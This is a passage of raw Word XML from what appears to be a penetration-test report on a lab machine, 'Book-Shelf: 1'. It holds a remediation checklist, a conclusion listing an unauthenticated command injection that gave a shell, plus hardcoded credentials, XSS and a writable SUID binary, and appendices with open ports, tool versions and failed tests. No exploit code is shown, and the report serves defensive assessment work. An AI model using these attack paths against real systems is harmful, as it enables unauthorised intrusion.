      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> direct shell execution with allow-listed, parameterized operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12785B8A" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>☐  Enforce</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> authentication and authorization checks on all protected/admin pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5C7196" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>☐  Apply</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> contextual output encoding to prevent reflected/stored XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7E40AA" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>☐  Fix</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> permissions on the identified SUID binary and audit for others</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258383F0" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>☐  Restrict</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> MySQL network access to required hosts only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41696149" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>☐  Apply</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> least-privilege principles across accounts, files, and services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C5F1DC" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>☐  Patch</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and upgrade outdated software where applicable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDC2B35" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="1F2937"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>10. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F72897D" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This engagement identified a critical, unauthenticated OS command injection vulnerability that provided remote code execution and an interactive shell on the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Book-Shelf</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>: 1 host, along with several supporting findings — hardcoded credentials, broken access control on an admin/profile page, anonymous FTP information disclosure, reflected XSS, a world-writable SUID binary, and MySQL network exposure. Confirmed access was limited to the www-data service account; despite identifying a plausible privilege-escalation vector (the writable SUID binary), escalation to the defender or root account was not demonstrated during testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48116D48" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The findings in this report reflect only what was directly observed and verified during the engagement window. Remediation should prioritize the Critical and High findings identified in Section 9, after which a follow-up assessment is recommended to validate that fixes have been applied effectively and that no new issues have been introduced.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9A3A12" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="1F2937"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>11. Appendix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB2B95A" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>A. Full Port List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50"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C64CEA" w14:paraId="50B25FAC" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="757D925A" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D646CAC" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4950" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40A9E491" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="6E6578EB" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="660D30E2" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>21/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2319416B" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ftp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4950" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1AEF6E41" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>vsftpd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3.0.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="4D7FF34C" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="45DCD03F" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>22/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="432DEAE9" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ssh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4950" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5399C74F" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="3128A5C6" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40A57D08" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>80/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="27BA6E41" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>http</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4950" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="36247EFE" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Apache httpd 2.4.38 (Debian)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="58D68866" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7F6C6C0D" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3306/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7D7A27BA" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>mysql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4950" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="52531842" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MySQL (unauthorized)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="174238D7" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="393B8487" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>33060/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B57EFDB" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>mysqlx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4950" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="379982F8" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MySQL X protocol listener</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="628B544A" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00C64CEA">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="162D7FF7" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>B. Tool Versions (where observed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A92DB7A" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap 7.95</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFAD2BB" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> v3.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177309A2" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>curl (version as shipped with Kali Linux, exact build not separately recorded)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33453A15" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>nc) —</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> traditional/GNU variant as shipped with Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D2143F" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Target: PHP 7.3.27-1~deb10u1 (cli), Apache/2.4.38 (Debian), Debian GNU/Linux 10 (buster), kernel 4.19.0-14-amd64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735F557A" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>C. Negative / Unproven Tests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5F2A0D" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The following were investigated during the engagement but did NOT yield confirmed, exploitable results. They are documented here for completeness and to make clear the boundaries of what was and was not achieved; they should not be read as vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDD0185" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>SQL injection attempts against the login endpoint did not produce evidence of SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4590527D" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Login attempts against the admin/root account using the FTP-derived wordlist password (case-differing from the confirmed hardcoded credential) failed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB952F6" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Execution of the identified SUID binary </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>(.shelf</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) did not successfully escalate privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB08121" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cron enumeration did not reveal a writable, root-executed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A56C00F" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>A request to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>flag.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> returned HTTP 404 Not Found.</w:t>
      </w:r>
    </w:p>
